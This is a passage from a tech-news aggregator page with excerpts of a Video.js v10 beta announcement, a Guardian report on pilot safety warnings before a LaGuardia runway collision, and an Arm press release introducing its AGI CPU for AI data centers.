For ex­am­ple here’s a sim­ple React hello world” with just a video and play but­ton, weigh­ing in at gzipped .

You could for sure build that ex­am­ple with an even smaller file size, but it’s meant to show that the the player in­fra­struc­ture is min­i­mal, while sup­port­ing much more ad­vanced and cus­tom play­ers.

In v10 we first split State, UI, and Media into their own com­po­nents that work to­gether through API con­tracts in­stead of mono­lithic con­trollers and over­loaded player ob­jects. Each ma­jor com­po­nent is op­tional and eas­ily swap­pable or con­fig­urable. UI and Media com­po­nents can also be used just by them­selves.

The cre­atePlayer func­tion takes an ar­ray of fea­tures (like Zustand store slices) to build up its in­ter­nal state ca­pa­bil­i­ties. If your player does­n’t need au­dio it does­n’t have to bun­dle the code for vol­ume and mute. In legacy play­ers this was­n’t pos­si­ble with­out fork­ing the code.

Don’t need UI or want to build your own? Just delete the skin, it’s right there in your code. In legacy play­ers, set­ting con­trols=false still re­sults in a bun­dle with all the con­trols. With v10 if you don’t im­port a com­po­nent, it does­n’t ex­ist in your bun­dle.

File size is far from the only im­por­tant per­for­mance met­ric when it comes to video play­ers, but it’s one that can get away from you quickly if you don’t ar­chi­tect for it up­front. There’s still im­prove­ments we can make but we’re re­ally happy with the re­sults of the new ar­chi­tec­ture so far.

Video.js v10 beta comes with a few pol­ished, com­plete skins (control sets) you can use out of the box. But we hope you don’t stop there be­cause we’ve put a lot of ef­fort into mak­ing the UI com­po­nents them­selves great to work with in any frame­work. We’ve started with React and Web Components, but hope to move quickly into sup­port­ing other pop­u­lar JS frame­works di­rectly.

When you’re ready to go deeper, you can eject any skin and get the full source code in your frame­work’s lan­guage — real com­po­nents you own and mod­ify, in­spired by shadcn/​ui. For Beta eject” just means copy/​paste from the docs, but a fancier CLI op­tion is on the way.

v10’s UI is built with un­styled UI prim­i­tives, in­spired by libs like Base UI and Radix, which means they get out of your way when you’re try­ing to do any­thing cus­tom. Each com­po­nent out­puts a sin­gle HTML el­e­ment, so you have di­rect ac­cess to every­thing hap­pen­ing in the UI.

They’re more ver­bose, and as a long time HTML-er I’ll ad­mit I was not a fan at first glance. But af­ter build­ing a player skin with them I un­der­stood why this is the way . For ex­am­ple, in the pre­vi­ous ver­sion (v8) the time­line thumb/​han­dle was a pseudo-el­e­ment on a nested child. You over­rode it through in­spect­ing the play­er’s out­put, us­ing speci­ficity and a font-size for di­men­sions.

In v10, it’s a real el­e­ment with a class you con­trol.

The pre­vi­ous ver­sion’s de­fault skin is used bil­lions of times every month, and yet we put rel­a­tively lit­tle de­sign ef­fort into it. At the time I hoped devs would style it and make it their own, and then they did­n’t.

For v10, Sam Potts (creator of Plyr, 29,000 GitHub stars largely on the strength of its de­sign) de­signed the new skins, and will con­tinue to in­vest in them and it­er­a­tions over time. The beta ships two skins: a de­fault skin with a frosted aes­thetic and a min­i­mal skin for de­vel­op­ers who want a clean start­ing point, both with re­fined con­trols, smooth in­ter­ac­tions, and thought­ful an­i­ma­tions

One de­tail I love is the er­ror di­a­log, where the vi­sual treat­ment matches the skin. I’m sure that feels tiny and sim­ple, but in Video.js his­tory this level of de­tail was so far down the pri­or­ity list that for a decade the er­ror di­a­log has been my big ugly text X’, for every skin. So when I see these new er­ror di­alogs it helps con­firm we’re all set­ting the bar higher, and I’m lov­ing it.

Amazon.com fea­tur­ing the ver­sion 8 er­ror di­a­log X” (I forced the er­ror for the screen­shot)

While these beta skins are a great start­ing point, they’re just the be­gin­ning.

If you wanted to build a pod­cast player with Video.js v8, you’d start with a video player, strip out the video-spe­cific parts, add some spe­cific au­dio fea­tures, and then spend real time on UI cus­tomiza­tion to get some­thing that ac­tu­ally looked and felt like a pod­cast player. Same story for a back­ground video on a land­ing page, or a short-form swi­peable player, or a class­room course player.

We do ac­tu­ally know what peo­ple are build­ing, be­lieve it or not. Not just the in­di­vid­ual fea­tures, but the spe­cific com­bi­na­tions that tend to show up to­gether. A TV stream­ing app needs dif­fer­ent things than a hero back­ground video, which needs dif­fer­ent things than a pod­cast player. And those com­bi­na­tions are pretty con­sis­tent across the web.

So in v10 we’re pack­ag­ing them up as pre­sets. A pre­set is a pur­pose-built com­bi­na­tion of skin, fea­tures, and me­dia con­fig­u­ra­tion for a spe­cific use case. Instead of as­sem­bling a player from scratch, you’ll pick the pre­set clos­est to what you’re build­ing and start there.

A de­fault video pre­set (general web­site video, the kind of thing you might oth­er­wise use the HTML video tag for)

A de­fault au­dio pre­set (same idea but for the au­dio tag)

And a back­ground video pre­set. Background video is where this con­cept re­ally starts to click, be­cause a back­ground video needs lay­out but does­n’t need con­trols and does­n’t need au­dio. Rather than hand­ing you a full player and ask­ing you to re­move things, we just give you the right player for the job.

This is also where the com­po­si­tional ar­chi­tec­ture pays off. The pre­set gets you started fast. The com­pos­able foun­da­tion un­der­neath means you can still add, re­move, or re­place any­thing. You get a real start­ing point with­out giv­ing up any of the flex­i­bil­ity.

Over time we’ll ex­pand into more use cases: cre­ator-plat­form play­ers, short-form swi­peable video, ed­u­ca­tional course play­ers. If there’s a use case you’d love to see, let us know.

The last year, and even just the last few months specif­i­cally have been a wild time to be build­ing a new pro­ject like this. We’re of course ex­cited for how AI will cre­ate in­ter­est­ing in­ter­ac­tive player fea­tures in the months and years to come and we have a few ideas of what those will be. For Beta, how­ever, we’ve been fo­cused on the agent ex­pe­ri­ence of build­ing video.js-based play­ers with the help of AI.

* Less-abstracted com­po­nents and un­styled UI prim­i­tives so agents can do more with the code right in your pro­ject and need fewer ex­ter­nal docs

* Markdown ver­sions of every in­di­vid­ual doc. If your agent hits our site with the ac­cept: text/​mark­down header — as many like Claude Code do — we’ll send the mark­down ver­sion of the page, sav­ing your agent loads of un­nec­es­sary con­text bloat.

* A grow­ing set of AI skills in the repo, cur­rently help­ing us build and soon will help you build too.

In writ­ing this part and get­ting in­put from the team I found we ac­tu­ally have a lot to say about our ex­pe­ri­ence build­ing with AI and the many ways we put it to use, so keep an eye out for a fol­lowup post on that topic.

A few things to know:

* The APIs are not quite sta­ble. This is a beta, so some in­ter­faces will change be­fore GA. Build with it, ex­per­i­ment, give us feed­back, put it on sim­ple pro­jects. It’s not yet the time to do a ma­jor mi­gra­tion.

* The fea­tures may be lim­ited. You might be sur­prised by which fea­tures aren’t sup­ported yet and also by which al­ready are. We are build­ing from a base of four ex­ist­ing play­ers, but our goal for reach­ing beta was sim­ple web­site play­back func­tion­al­ity. It’s ac­ces­si­ble and sup­ports cap­tions, and al­ready works with many for­mats and stream­ing ser­vices, but things like set­tings menus are still on their way.

* We re­ally want your feed­back. File is­sues on GitHub, join the con­ver­sa­tion on dis­cord, tell us what works and what does­n’t. In gen­eral, peo­ple seem to get less en­gaged with JS widgets” like a video player com­pared to JS frame­works, so please don’t be shy. Your in­put is re­ally valu­able.

If you’re start­ing some­thing new, this is a good time to try v10. Go to videojs.org and check out the in­stal­la­tion guide.

If you’re run­ning a pre­vi­ous ver­sion in pro­duc­tion, sit tight. We’ll have mi­gra­tion guides be­fore we ask you to move.

We’re aim­ing for mid-2026 for GA. Between now and then:

* Feature par­ity with the ca­pa­bil­i­ties de­vel­op­ers rely on in the pre­vi­ous ver­sion of Plyr, Vidstack and Media Chrome.

Planning ads sup­port later in 2026. Ads are com­pli­cated.

* Planning ads sup­port later in 2026. Ads are com­pli­cated.

* More player pre­sets for com­mon use cases

@cpilsbury, @decepulis, @esbie, @luwes, @mihar-22, @sampotts for build­ing the thing — who needs AI when you have the ab­solute best team of peo­ple in the world. I’m aware that makes no sense.

That said, @claude. I don’t know if you can hear this yet, but we cer­tainly burned through some to­kens to­gether.

@dhassoun, @essk, @ewelch-mux, @gesinger, @gkatsev, @kixelated, @littlespex, @mister-ben, @misteroneill for be­ing the best ad­vi­sors and in­ter­nal cham­pi­ons a pro­ject could hope for.

My com­pany @muxinc for step­ping in to make sure Video.js still has breath and al­low­ing many of us to spend all our time on it. And @brightcove for keep­ing it breath­ing for so many years be­fore. Our friends at @qualabs for car­ry­ing the load of other pro­jects and giv­ing us time to fo­cus.

I’m very ex­cited for you to fall back in love with your video player ❤️ (This is a theme we’re do­ing. We have cool stick­ers.)

...

Read the original on videojs.org »

7 406 shares, 16 trendiness

So where are all the AI apps? – Answer.AI

...

Read the original on www.answer.ai »

8 370 shares, 16 trendiness

LaGuardia pilots raised safety alarms months before deadly runway crash

Pilot safety con­cerns about New York’s LaGuardia air­port were filed to avi­a­tion of­fi­cials months be­fore Sunday’s col­li­sion be­tween an air­plane and a fire truck left two pi­lots dead and 41 other peo­ple hos­pi­tal­ized.

According to the avi­a­tion safety re­port­ing sys­tem ad­min­is­tered by the US space agency Nasa, a pi­lot us­ing the air­port in the sum­mer wrote, Please do some­thing,” af­ter air traf­fic con­trollers failed to pro­vide ap­pro­pri­ate guid­ance about mul­ti­ple nearby air­craft.

The pace of op­er­a­tions is build­ing in LGA,” they wrote, re­fer­ring to the New York City air­port, one of the busiest in the US. The con­trollers are push­ing the line.”

In a ref­er­ence to the January 2025 mid-air col­li­sion over the Potomac River in Washington DC that killed more than 60 peo­ple, they said: On thun­der­storm days, LGA is start­ing to feel like [Ronald Reagan National air­port] did be­fore the ac­ci­dent there.”

The warn­ing, first re­ported by CNN, showed that the pi­lot of the air­craft was con­cerned that LaGuardia’s con­trol tower ini­ti­ated a take­off clear­ance for an air­craft when their plane was only 300 feet high on fi­nal” ap­proach on a dif­fer­ent run­way — and the de­part­ing plane had hes­i­tated ini­ti­at­ing its take­off run.

I think he or she thought twice be­fore start­ing their take­off roll,” the pi­lot of the air­craft said. The pi­lot men­tioned how thick, smoky haze from wild­fires in Canada at the time as well as a pos­si­ble he­li­copter in the area had con­vinced him it was safer to con­tinue the ap­proach and land [about] 10 sec­onds af­ter the de­part­ing air­craft crossed our path”.

Otherwise, the pi­lot added, he would have been left suddenly go­ing around and trust­ing that the he­li­copter was not near the de­par­ture end of 22”, with the num­ber re­fer­ring to a run­way.

The pi­lot con­cluded: the [air traf­fic con­trol] guid­ance … does not seem to give guid­ance on ex­actly how close air­craft in this sit­u­a­tion can get.”

Based on to­day’s and close calls I have seen over the years for [runways at the Philadelphia and Newark in­ter­na­tional air­ports], it seems to be a [judgment] call by the lo­cal con­troller.”

They also said that a run­way light­ing sys­tem had been turned off. In an­other re­port since January 2025, a pi­lot said their air­craft had been cleared to cross a run­way — but cross­ing we no­ticed an air­craft we thought was land­ing at [runway] 31C seem­ingly headed for us.”

Air traf­fic con­trol should have sent the air­craft around”, they said.

Nasa’s Aviation Safety Reporting System has re­ceived dozens of anony­mous pi­lot com­plaints about safety con­cerns at the small­est of New York’s three lo­cal air­ports.

The re­ports come as in­ves­ti­ga­tors are look­ing into the col­li­sion of a land­ing Air Canada Express flight 646 from Montreal that col­lided with an air­port firetruck that had been cleared to cross the run­way, lead­ing to the deaths of pi­lots MacKenzie Gunther and Antoine Forest as well as in­juries to dozens more.

After the air traf­fic con­troller cleared the fire truck, which was re­spond­ing to a plane that had re­ported dif­fi­cul­ties, the con­troller then tried to stop it from cross­ing. He could later be heard say­ing on a record­ing that he had been dealing with an emer­gency ear­lier” and that he messed up”.

The crash has raised fears that op­er­a­tions at US air­ports are un­der ex­treme stress. Airports have been deal­ing with a short­age of air traf­fic con­trollers, ex­ac­er­bated by bru­tal fed­eral gov­ern­ment per­son­nel cuts by Donald Trump’s ad­min­is­tra­tion at the start of his sec­ond pres­i­dency.

Airports have also grap­pled with age­ing equip­ment and a short­age of se­cu­rity screen­ers ow­ing to a par­tial gov­ern­ment shut­down since mid-Feb­ru­ary, which has caused long se­cu­rity lines and frus­tra­tion among trav­el­ers. More than 450 TSA of­fi­cers have quit dur­ing the par­tial gov­ern­ment shut­down, Department of Homeland Security said on Tuesday.

We did not need an­other avi­a­tion tragedy to see this com­ing,” said to avi­a­tion ex­pert Brian Fielkow in a com­ment to the Guardian. An in­ves­ti­ga­tion into the col­li­sion will take take time, he warned, but let’s stop pre­tend­ing we don’t un­der­stand the con­di­tions in which this is hap­pen­ing.

We are watch­ing a sys­tem un­der strain. TSA pro­fes­sion­als are show­ing up to work with­out pay. This cre­ates dis­trac­tion, in­sta­bil­ity and un­nec­es­sary risk. We are ask­ing peo­ple re­spon­si­ble for se­cur­ing our trans­porta­tion sys­tem to op­er­ate un­der fi­nan­cial and emo­tional strain and ex­pect­ing flaw­less per­for­mance. We are man­ag­ing avi­a­tion safety like a po­lit­i­cal pawn in­stead of a sys­tem that can­not fail.”

Federal in­ves­ti­ga­tors said late on Monday it was too soon to an­swer many ques­tions about Sunday’s deadly ac­ci­dent but promised more in­for­ma­tion would be re­leased Tuesday.

Jennifer Homendy, the National Transportation Safety Board (NTSB) chair whose agency is in­ves­ti­gat­ing Sunday’s crash, said in­ves­ti­ga­tors would an­a­lyze the in­volved air­plane’s cock­pit and flight data recorders, which were re­cov­ered from the wreck un­dam­aged.

She said the run­way where the crash hap­pened was likely to be closed for days as in­ves­ti­ga­tors sift through a tremendous amount of de­bris”.

Homendy also said that an NTSB in­ves­ti­ga­tor sent to LaGuardia on Monday was de­layed for three hours by se­cu­rity lines in Houston.

Our air traf­fic con­trol spe­cial­ist, who was in line … for three hours, un­til we called … to beg, to see if we can get her through, so we can get her here.

So it’s been a re­ally big chal­lenge to get the en­tire team here, and they’re still ar­riv­ing as we speak,” Homandy added.

The Trump ad­min­is­tra­tion has sent Immigration and Customs Enforcement (ICE) agents to many US air­ports, claim­ing they are there to help with long pre-se­cu­rity lines.

Adam Stahl, the act­ing TSA deputy ad­min­is­tra­tor, told Fox News that ICE agents would be conducting non-spe­cial­ized se­cu­rity sup­port — man­ning the exit lanes, crowd man­age­ment, line con­trol … to help al­le­vi­ate the chal­lenges that our of­fi­cers are fac­ing”.

Hundreds of Transportation Security Administration (TSA) agents have called in sick or quit their jobs rather than be forced to work with­out pay amid the shut­down. The shut­down stems from the US Senate not fund­ing the TSAs par­ent agency over a dis­agree­ment over im­mi­gra­tion en­force­ment re­forms.

Sean Duffy, the US trans­porta­tion sec­re­tary, on Monday de­clined to say how many con­trollers were on duty at LaGuardia when Sunday’s crash hap­pened, de­fer­ring in­stead to the on­go­ing NTSB in­ves­ti­ga­tion.

But he de­nied ru­mors that the tower had only one con­troller on duty. He said LaGuardia was very well staffed”, with 33 cer­ti­fied con­trollers and more in train­ing. He said the goal was to have 37 on staff.

Sunday’s in­ci­dent was not the only col­li­sion at LaGuardia in re­cent months. In October, two Delta jets col­lided on a taxi­way, send­ing one per­son to a hos­pi­tal.

In July 2024, a co-pi­lot re­ported a sim­i­lar near-col­li­sion af­ter con­trollers said a plane was cleared to cross the run­way even though an­other air­craft was land­ing at the same time.

Ground con­trol is­sued a stop com­mand just in time,” the re­port en­try said.

...

Read the original on www.theguardian.com »

9 361 shares, 17 trendiness

Disruption with some GitHub services

...

Read the original on www.githubstatus.com »

10 355 shares, 17 trendiness

The silicon foundation for the agentic AI cloud era

Today, Arm is an­nounc­ing the Arm AGI CPU, a new class of pro­duc­tion-ready sil­i­con built on the Arm Neoverse plat­form and de­signed to power the next gen­er­a­tion of AI in­fra­struc­ture.

For the first time in our more than 35-year his­tory, Arm is de­liv­er­ing its own sil­i­con prod­ucts — ex­tend­ing the Arm Neoverse plat­form be­yond IP and Arm Compute Subsystems (CSS) to give cus­tomers greater choice in how they de­ploy Arm com­pute — from build­ing cus­tom sil­i­con to in­te­grat­ing plat­form-level so­lu­tions or de­ploy­ing Arm-designed proces­sors. It re­flects both the rapid evo­lu­tion of AI in­fra­struc­ture and grow­ing de­mand from the ecosys­tem for pro­duc­tion-ready Arm plat­forms that can be de­ployed at pace and scale.

AI sys­tems are in­creas­ingly op­er­at­ing con­tin­u­ously at global scale. Historically, the hu­man was the bot­tle­neck in com­put­ing — the pace at which peo­ple could in­ter­act with sys­tems de­fined how quickly work could move through them. In the era of agen­tic AI, that con­straint dis­ap­pears as soft­ware agents co­or­di­nate tasks, in­ter­act with mul­ti­ple mod­els and make de­ci­sions in real time.

As AI sys­tems run con­tin­u­ously and work­loads grow in com­plex­ity, the CPU be­comes the pac­ing el­e­ment of mod­ern in­fra­struc­ture — re­spon­si­ble for keep­ing dis­trib­uted AI sys­tems op­er­at­ing ef­fi­ciently at scale. In a mod­ern-day AI data cen­ter, the CPU man­ages thou­sands of dis­trib­uted tasks — or­ches­trat­ing ac­cel­er­a­tors, man­ag­ing mem­ory and stor­age, sched­ul­ing work­loads and mov­ing data across sys­tems — and now, with agen­tic AI, co­or­di­nat­ing fan-out across large num­bers of agents.

This shift places new de­mands on the CPU and that re­quires an evo­lu­tion of the proces­sor.

Arm Neoverse al­ready un­der­pins many of to­day’s lead­ing hy­per­scale and AI plat­forms, in­clud­ing AWS Graviton, Google Axion, Microsoft Azure Cobalt and NVIDIA Vera. As AI in­fra­struc­ture scales glob­ally, part­ners across the ecosys­tem are ask­ing Arm to do more. The Arm AGI CPU was cre­ated to ad­dress this shift.

Agentic AI work­loads de­mand sus­tained per­for­mance at mas­sive scale. The Arm AGI CPU is de­signed to de­liver high per-task per­for­mance at sus­tained load across thou­sands of cores in par­al­lel — all within the power and cool­ing lim­its of mod­ern data cen­ters.

Every el­e­ment of the Arm AGI CPU — from op­er­at­ing fre­quency to mem­ory and I/O ar­chi­tec­ture — has been de­signed to sup­port mas­sively par­al­lel, high-per­for­mance agen­tic work­loads in a densely pop­u­lated rack de­ploy­ment.

Arm’s ref­er­ence server con­fig­u­ra­tion is a 1OU, 2-node de­sign — pack­ing in two chips with ded­i­cated mem­ory and I/O for a to­tal of 272 cores per blade. These blades are de­signed to fully pop­u­late a stan­dard air-cooled 36kW rack — 30 blades de­liv­er­ing a to­tal of 8160 cores. Arm has ad­di­tion­ally part­nered with Supermicro on a liq­uid-cooled 200kW de­sign ca­pa­ble of hous­ing 336 Arm AGI CPUs for over 45,000 cores.

In this con­fig­u­ra­tion, the Arm AGI CPU is ca­pa­ble of de­liv­er­ing more than 2x the per­for­mance per rack com­pared to the lat­est x86 sys­tems*, achieved through the fun­da­men­tal ad­van­tages of the Arm ar­chi­tec­ture and care­ful match­ing of sys­tem re­sources to com­pute:

* Arm AGI CPUs class-lead­ing mem­ory band­width means more ef­fec­tive threads of ex­e­cu­tion per rack; x86 CPUs de­grade as cores con­tend un­der sus­tained load.

* High per­for­mance, ef­fi­cient, sin­gle-threaded Arm Neoverse V3 CPU cores out­per­form legacy ar­chi­tec­tures; every Arm thread does more work.

* More us­able threads and more work-per-thread com­pounds to mas­sive per­for­mance gains per rack.

The Arm AGI CPU is al­ready see­ing strong com­mer­cial mo­men­tum with part­ners at the fore­front of scal­ing agen­tic AI in­fra­struc­ture. Planned de­ploy­ments span ac­cel­er­a­tor man­age­ment, agen­tic or­ches­tra­tion and the den­si­fi­ca­tion of ser­vices, ap­pli­ca­tions and tools needed for agen­tic task scale-out — as well as in­creased net­work­ing and data plane com­pute to sup­port the AI data cen­ter.

Meta is our lead part­ner and cus­tomer, co-de­vel­op­ing the Arm AGI CPU to op­ti­mize gi­gawatt-scale in­fra­struc­ture for its Meta fam­ily of apps and to work along­side Meta’s own cus­tom MTIA ac­cel­er­a­tors. Other launch part­ners in­clude Cere­bras, Cloudflare, F5, OpenAI, Positron, Rebellions, SAP, and SK Telecom — each work­ing with Arm on the de­ploy­ment of the Arm AGI CPU to ac­cel­er­ate AI-driven ser­vices across cloud, net­work­ing and en­ter­prise en­vi­ron­ments. Commercial sys­tems are now avail­able for or­der from ASRockRack, Lenovo and Supermicro.

To ac­cel­er­ate adop­tion fur­ther, Arm is in­tro­duc­ing the Arm AGI CPU 1OU Dual Node Reference Server, an Open Compute Project (OCP) DC-MHS stan­dard form fac­tor server. Arm plans to con­tribute this ref­er­ence server de­sign and sup­port­ing firmware, along with fur­ther con­tri­bu­tions in­clud­ing sys­tem ar­chi­tec­ture spec­i­fi­ca­tions, de­bug frame­works and di­ag­nos­tic and ver­i­fi­ca­tion tool­ing ap­plic­a­ble to all Arm-based sys­tems. Further de­tails will come at the up­com­ing OCP EMEA Summit.

The launch of Arm AGI CPU rep­re­sents a new chap­ter in Arm’s data cen­ter jour­ney and con­tin­ued lead­er­ship in com­put­ing in­no­va­tion. As AI re­shapes the in­dus­try, Arm re­mains com­mit­ted to en­abling progress across the ecosys­tem — meet­ing cus­tomers where they are, from hy­per­scale cloud providers to AI star­tups.

The Arm AGI CPU is the first of­fer­ing of Arm’s new data cen­ter sil­i­con prod­uct line and is avail­able to or­der now. Follow-on prod­ucts are com­mit­ted, tar­get­ing best-in-class per­for­mance, scale and ef­fi­ciency. This con­tin­ues in par­al­lel with the Arm Neoverse CSS prod­uct roadmap so that all Arm data cen­ter cus­tomers move for­ward to­gether on plat­form ar­chi­tec­ture and soft­ware com­pat­i­bil­ity.

Entering this new chap­ter, our mis­sion re­mains un­changed: to pro­vide the com­pute foun­da­tion that en­ables in­no­va­tion across in­dus­tries. And the ecosys­tem is fully be­hind us: More than 50 lead­ing com­pa­nies across hy­per­scale, cloud, sil­i­con, mem­ory, net­work­ing, soft­ware, sys­tem de­sign and man­u­fac­tur­ing are sup­port­ing the ex­pan­sion of the Arm com­pute plat­form into sil­i­con. With Arm AGI CPU, we are not only defin­ing the ar­chi­tec­ture of the AI-native data cen­ter, we are build­ing it.

Hear more from our Arm AGI CPU de­ploy­ment part­ners:

At Cerebras we build AI in­fra­struc­ture de­signed for ul­tra-fast, large-scale in­fer­ence, and as this be­comes the dom­i­nant work­load in AI, com­pos­able, high-per­for­mance sys­tems mat­ter more than ever — these sys­tems need pur­pose-built AI ac­cel­er­a­tion along­side ef­fi­cient, scal­able CPUs or­ches­trat­ing data move­ment, net­work­ing, and co­or­di­na­tion at scale. Extending the Arm com­pute plat­form into AGI-class in­fra­struc­ture is a pos­i­tive step for the ecosys­tem and for cus­tomers de­ploy­ing AI at global scale.” — Andrew Feldman, CEO, Cerebras

To con­tinue our mis­sion of help­ing build a bet­ter Internet, Cloudflare needs in­fra­struc­ture that scales ef­fi­ciently across our global net­work. The Arm AGI CPU pro­vides high-per­for­mance, en­ergy-ef­fi­cient com­pute de­signed for the next gen­er­a­tion of work­loads.” — Stephanie Cohen, Chief Strategy Officer, Cloudflare

Delivering AI ex­pe­ri­ences at global scale de­mands a ro­bust and adapt­able port­fo­lio of cus­tom sil­i­con so­lu­tions, pur­pose-built to ac­cel­er­ate AI work­loads and op­ti­mize per­for­mance across Meta’s plat­forms. We worked along­side Arm to de­velop the Arm AGI CPU to de­ploy an ef­fi­cient com­pute plat­form that sig­nif­i­cantly im­proves our data cen­ter per­for­mance den­sity and sup­ports a multi-gen­er­a­tion roadmap for our evolv­ing AI sys­tems.” — Santosh Janardhan, Head of Infrastructure, Meta

OpenAI runs AI sys­tems at mas­sive scale. Hundreds of mil­lions use ChatGPT every day, busi­nesses build on our API, and de­vel­op­ers rely on tools like Codex. The Arm AGI CPU will play an im­por­tant role in our in­fra­struc­ture as we scale, strength­en­ing the or­ches­tra­tion layer that co­or­di­nates large scale AI work­loads and im­prov­ing ef­fi­ciency, per­for­mance, and band­width across the sys­tem.” — Sachin Katti, Head of Industrial Compute at OpenAI

At Positron, we are fo­cused on pur­pose-built in­fer­ence ac­cel­er­a­tors that de­liv­ers break­through to­ken gen­er­a­tion ef­fi­ciency us­ing com­mod­ity mem­ory. Arm has con­sis­tently de­liv­ered the in­dus­try’s most power-ef­fi­cient com­pute plat­forms, which makes the Arm AGI CPU a nat­ural foun­da­tion for next-gen­er­a­tion AI in­fra­struc­ture. By com­bin­ing Positron’s in­fer­ence ac­cel­er­a­tion tech­nol­ogy with the en­ergy-ef­fi­cient Arm AGI CPU plat­form, we see a pow­er­ful op­por­tu­nity to help data cen­ter op­er­a­tors de­ploy fron­tier AI mod­els at scale with greater per­for­mance per watt and per dol­lar.” — Mitesh Agrawal, CEO, Positron AI

High-performance AI sys­tems re­quire tight co­or­di­na­tion be­tween gen­eral-pur­pose com­pute and ac­cel­er­a­tor ar­chi­tec­tures. By com­bin­ing the Arm AGI CPU with Rebellions’ NPUs in new high-den­sity server con­fig­u­ra­tions — we’re de­liv­er­ing a scal­able, en­ergy ef­fi­cient plat­form that is op­ti­mized for AI in­fer­ence work­loads at scale.” — Marshall Choy, Chief Business Officer, Rebellions

SAPs suc­cess­ful de­ploy­ment of SAP HANA on Arm-based AWS Graviton un­der­scores the ma­tu­rity and per­for­mance of the Arm ecosys­tem for en­ter­prise work­loads. The Arm AGI CPU ex­tends that op­por­tu­nity, pro­vid­ing scal­able, ef­fi­cient com­pute de­signed to sup­port the next gen­er­a­tion of AI-powered busi­ness so­lu­tions.” — Stefan Bäuerle, Senior Vice President, Head of HANA & Persistency, SAP

SK Telecom is ex­pand­ing into large-scale, full-stack AI in­fer­ence data cen­ter in­fra­struc­ture, which in­cludes Arm AGI CPU and Rebellions AI ac­cel­er­a­tor chip. By bring­ing to­gether our sov­er­eign A. X foun­da­tion model with in­fer­ence-op­ti­mized AI servers, we are ready to de­liver it to world while el­e­vat­ing our AIDC com­pet­i­tive­ness.” — Suk-geun (SG) Chung, CTO and Head of AI CIC, SK Telecom

This blog post con­tains for­ward-look­ing state­ments re­gard­ing Arm’s prod­uct roadmap, fu­ture per­for­mance, planned con­tri­bu­tions and part­ner de­ploy­ments. These state­ments are based on cur­rent ex­pec­ta­tions and are sub­ject to risks and un­cer­tain­ties that could cause ac­tual re­sults to dif­fer ma­te­ri­ally. For a dis­cus­sion of fac­tors that could af­fect Arm’s re­sults, please re­fer to Arm’s fil­ings with the U. S. Securities and Exchange Commission.

Performance claims are based on Arm in­ter­nal es­ti­mates com­par­ing a fully pop­u­lated rack of Arm AGI CPU-based servers against com­pa­ra­ble x86-based server con­fig­u­ra­tions us­ing in­dus­try-stan­dard work­loads. Actual re­sults may vary based on sys­tem con­fig­u­ra­tion, work­load, and other fac­tors.

All prod­uct and com­pany names are trade­marks or reg­is­tered trade­marks of their re­spec­tive hold­ers.

...

Read the original on newsroom.arm.com »

To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".

10HN is also available as an iOS App

If you visit 10HN only rarely, check out the the best articles from the past week.

If you like 10HN please leave feedback and share

Visit pancik.com for more.